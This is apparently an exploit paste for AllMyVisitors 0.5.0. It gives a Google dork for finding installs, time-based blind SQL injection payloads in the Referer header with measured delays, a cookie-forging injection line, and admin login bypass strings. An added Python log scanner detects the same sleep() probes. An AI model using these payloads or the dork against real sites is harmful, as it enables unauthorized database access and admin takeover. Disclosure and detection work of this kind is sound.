Kyfx

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability

Mar 6th, 2015
Google Dork : "Copyright (c) 2004 by voice of web"

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user
input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and
do not properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it
is relatively easy to protect against, a large number of web applications are vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
HTTP Header input Referer was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/

Tests performed :

if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"
*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"
*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"
*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"
*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"
*/ => 0.577 s

Insecure Cookie Handling :

admin.php

javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

Auth Bypass admin.php :

Username : azerty' or '1=1--# Real admin name

Password : demo1 ' or ' 1=1 or Admin or any thing
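
A defender's view of the Referer timing tests above, as an added example that is not part of the original paste: it scans access-log lines for sleep() in the Referer header and marks a request as executed when the response took at least the requested delay over the normal baseline. The log layout (combined format plus a trailing request time), the scan function and the sample lines are assumptions constructed for illustration; the timings 0.561, 6.099 and 18.439 s are the ones reported above.

```python
import re
from statistics import median

# sleep(N) is the delay primitive used in the tests on this page.
DELAY_RE = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# Assumed layout: combined log format with the request time (seconds) appended.
# Servers escape a double quote inside a logged header, so [^"]* is enough here.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*" (?P<rt>\d+(?:\.\d+)?)$')

def scan(lines):
    """Return one finding per request whose Referer carries a sleep() call."""
    rows = [m.groupdict() for m in map(LINE_RE.match, lines) if m]
    # Baseline = median response time of requests without a delay expression.
    clean = [float(r["rt"]) for r in rows if not DELAY_RE.search(r["referer"])]
    baseline = median(clean) if clean else 0.0
    findings = []
    for r in rows:
        delays = [float(d) for d in DELAY_RE.findall(r["referer"])]
        if not delays:
            continue
        asked, took = max(delays), float(r["rt"])
        # A probe alone shows scanning; a response slowed by at least the
        # requested delay shows the database evaluated the header value.
        executed = asked > 0 and took - baseline >= asked
        findings.append({"ip": r["ip"], "asked": asked, "took": took,
                         "executed": executed})
    return findings

def _line(referer, rt):
    # Constructed sample entry; 203.0.113.7 is a documentation address.
    return ('203.0.113.7 - - [06/Mar/2015:10:00:00 +0000] '
            '"GET /AllMyVisitors0.5.0/ HTTP/1.1" 200 512 '
            f'"{referer}" "Mozilla/5.0" {rt}')

# Constructed log: Referer values are one branch of the page's test string.
SAMPLE_LOG = [
    _line("http://example.test/", "0.480"),
    _line("-", "0.520"),
    _line("'XOR(if(now()=sysdate(),sleep(0),0))OR'", "0.561"),
    _line("'XOR(if(now()=sysdate(),sleep(2),0))OR'", "6.099"),
    _line("'XOR(if(now()=sysdate(),sleep(6),0))OR'", "18.439"),
    # Hypothetical timing for the same probe once the header is bound as a parameter.
    _line("'XOR(if(now()=sysdate(),sleep(4),0))OR'", "0.530"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with executed set to True are the ones to treat as a confirmed injection point rather than scanner noise.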